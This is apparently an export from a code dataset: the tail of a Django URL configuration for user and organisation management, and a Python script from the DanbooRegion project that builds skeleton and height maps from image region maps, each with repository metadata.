url(r'^logout/$', 'logout'),
url(r'^passwd/$', 'passwd'),
url(r'^admin/$', 'admin'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/$', 'org'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/add/$', 'org_add'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/promote/(?P<user_uid>[a-z-.]+)/$', 'org_promote'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/relegate/(?P<user_uid>[a-z-.]+)/$', 'org_relegate'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/enable_ssh/(?P<user_uid>[a-z-.]+)/$', 'enable_ssh'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/disable_ssh/(?P<user_uid>[a-z-.]+)/$', 'disable_ssh'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/enable_admin/(?P<user_uid>[a-z-.]+)/$', 'enable_admin'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/disable_admin/(?P<user_uid>[a-z-.]+)/$', 'disable_admin'),
url(r'^process/(?P<token>[a-z0-9]{32})/$', 'process'),
url(r'^help/$', 'help'),
)
| [
"bertrandbc@gmail.com"
] | bertrandbc@gmail.com |
4b441cce5504aeabb288222da853f57bac341f53 | e8d8aecb5e9031ba1f354c5f0d04075587a03a82 | /code/skeletonize.py | 3e4d3139e244de745998738d46cec36385e6b01b | [
"Apache-2.0"
] | permissive | UdonDa/DanbooRegion | 6bf425494bada965ced00463db8fcf8f19dfd7e4 | bf6fc66bec0d585efece2865d3251f52186882b5 | refs/heads/master | 2022-12-06T12:48:31.428187 | 2020-07-20T06:33:21 | 2020-07-20T06:33:21 | 284,989,195 | 0 | 0 | Apache-2.0 | 2020-08-04T13:32:41 | 2020-08-04T13:32:40 | null | UTF-8 | Python | false | false | 1,460 | py | from tricks import *
from skimage.morphology import skeletonize, dilation
def get_skeleton(region_map):
Xp = np.pad(region_map, [[0, 1], [0, 0], [0, 0]], 'symmetric').astype(np.float32)
Yp = np.pad(region_map, [[0, 0], [0, 1], [0, 0]], 'symmetric').astype(np.float32)
X = np.sum((Xp[1:, :, :] - Xp[:-1, :, :]) ** 2.0, axis=2) ** 0.5
Y = np.sum((Yp[:, 1:, :] - Yp[:, :-1, :]) ** 2.0, axis=2) ** 0.5
edge = np.zeros_like(region_map)[:, :, 0]
edge[X > 0] = 255
edge[Y > 0] = 255
edge[0, :] = 255
edge[-1, :] = 255
edge[:, 0] = 255
edge[:, -1] = 255
skeleton = 1.0 - dilation(edge.astype(np.float32) / 255.0)
skeleton = skeletonize(skeleton)
skeleton = (skeleton * 255.0).clip(0, 255).astype(np.uint8)
field = np.random.uniform(low=0.0, high=255.0, size=edge.shape).clip(0, 255).astype(np.uint8)
field[skeleton > 0] = 255
field[edge > 0] = 0
filter = np.array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0]],
dtype=np.float32) / 5.0
height = np.random.uniform(low=0.0, high=255.0, size=field.shape).astype(np.float32)
for _ in range(512):
height = cv2.filter2D(height, cv2.CV_32F, filter)
height[skeleton > 0] = 255.0
height[edge > 0] = 0.0
return height.clip(0, 255).astype(np.uint8)
if __name__=='__main__':
import sys
region_map = cv2.imread(sys.argv[1])
cv2.imshow('vis', get_skeleton(region_map))
cv2.waitKey(0)
| [
"914847518@qq.com"
] | 914847518@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.